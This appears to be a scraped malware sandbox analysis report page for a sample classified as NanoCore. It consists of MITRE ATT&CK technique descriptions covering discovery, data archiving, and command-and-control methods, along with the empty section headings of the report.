Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 471e3984_by_Libranalysis

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre